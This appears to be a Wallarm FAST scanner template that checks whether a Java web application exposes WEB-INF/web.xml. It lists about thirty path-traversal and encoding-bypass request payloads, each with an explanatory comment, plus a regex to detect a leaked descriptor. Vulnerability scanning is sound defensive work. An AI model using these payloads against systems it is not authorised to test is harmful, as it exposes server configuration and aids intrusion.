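# Wallarm FAST detect: probes whether the Java deployment descriptor
# (WEB-INF/web.xml) can be read from outside the application.
#
# Every request below carries its traversal/encoding trick in the raw URI, so
# you have to add the URI_.* insertion point to your policy or none of these
# requests will be generated.
#
# The entries are grouped by the bypass technique they exercise; the order is
# kept as originally written.
send:
  # Direct access. The lowercase and trailing-dot variants target deployments
  # whose path matching or filesystem is case-insensitive or drops a trailing
  # "." (assumption from the payloads themselves; confirm per target).
  - method: 'GET'
    url: "/WEB-INF/web.xml"
  - method: 'GET'
    url: "/web-inf/web.xml"
  - method: 'GET'
    url: "/WEB-INF./web.xml"
  # Plain dot-dot traversal at increasing depth, plus one that starts from a
  # subdirectory so the ".." is applied to an existing path segment.
  - method: 'GET'
    url: "/../WEB-INF/web.xml"
  - method: 'GET'
    url: "/../../WEB-INF/web.xml"
  - method: 'GET'
    url: "/../../../WEB-INF/web.xml"
  - method: 'GET'
    url: "/../../../../WEB-INF/web.xml"
  - method: 'GET'
    url: "/demo/../WEB-INF/web.xml"
  # Double URL-encoded slash ("%252f" decodes to "%2f", then to "/"): the
  # front end sees a harmless segment, the backend decodes it a second time.
  - method: 'GET'
    url: "/wiki/struts/..%252f..%252f/WEB-INF/web.xml"
  - method: 'GET'
    url: "/wiki/struts/..%252f..%252f..%252f/WEB-INF/web.xml"
  # Path-parameter segment ("..;/") raw, single- and double-encoded. Servlet
  # containers strip ";..." path parameters, so a reverse proxy that already
  # normalised the path does not see the traversal the container will apply.
  - method: 'GET'
    url: "/..;/WEB-INF/web.xml"
  - method: 'GET'
    url: "/..;/..;/WEB-INF/web.xml"
  - method: 'GET'
    url: "/..%3B/WEB-INF/web.xml"
  - method: 'GET'
    url: "/..%253B/WEB-INF/web.xml"
  # Doubled slash before the traversal, with and without an overlong-UTF-8
  # NUL ("%C0%80") followed by ".jsp" appended so the request can fall into a
  # *.jsp servlet mapping while the file name still ends at web.xml.
  - method: 'GET'
    url: "/plugins//../WEB-INF/web.xml%C0%80.jsp"
  - method: 'GET'
    url: "/js/app//../WEB-INF/web.xml%C0%80.jsp"
  - method: 'GET'
    url: "/js/app//../WEB-INF/web.xml"
  - method: 'GET'
    url: "/js/app//../../WEB-INF/web.xml"
  # Overlong UTF-8 encoding of "." ("%C0%AE"): a decoder that accepts
  # non-shortest forms turns these into ".." after any traversal filter ran.
  - method: 'GET'
    url: "/ctxroot/%C0%AE/WEB-INF/web.xml"
  - method: 'GET'
    url: "/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml"
  - method: 'GET'
    url: "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/WEB-INF/web.xml"
  # Traversal with an encoded trailing path parameter (";x=") or the
  # overlong-NUL ".jsp" suffix appended after the target file name.
  - method: 'GET'
    url: "/js/app/../../WEB-INF/web.xml%3bx%3d/"
  - method: 'GET'
    url: "/js/app/1//../../WEB-INF/web.xml%C0%80.jsp"
  # Single overlong "." segment, then double-encoded ("%25c0%25ae") variants
  # at increasing depth.
  - method: 'GET'
    url: "/%c0%ae/WEB-INF/web.xml"
  - method: 'GET'
    url: "/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
  - method: 'GET'
    url: "/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
  - method: 'GET'
    url: "/%25c0%25ae/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
  # Raw trailing path parameter (";x=") on the direct and traversal forms.
  - method: 'GET'
    url: "/WEB-INF/web.xml;x="
  - method: 'GET'
    url: "/../WEB-INF/web.xml;x="
  - method: 'GET'
    url: "/../../WEB-INF/web.xml;x="
  - method: 'GET'
    url: "/../../../WEB-INF/web.xml;x="
detect:
  - response:
      # A hit requires a complete <web-app ...>...</web-app> element in the
      # body, i.e. the descriptor itself was served rather than an error page
      # that merely echoes the requested path. The pattern is kept in single
      # quotes so the backslashes reach the regex engine unchanged. Confirm a
      # match by hand: web.xml typically exposes servlet mappings and security
      # constraints, which is more than "info" suggests.
      - body: '<web-app[\w\W]+<\/web-app>'
meta-info:
  - title: "Java web.xml information leakage vulnerability"
  - description: "WEB-INF directory may be accessed by external users because of improper configuration, resulting in the leakage of configuration information."
  - type: info
  - threat: 20
  - applicable_for:
      - fast
      - scanner
  - tags:
      - Information Exposure
      - Java
      - web-inf
      - tomcat
      - JBoss
      - J2EE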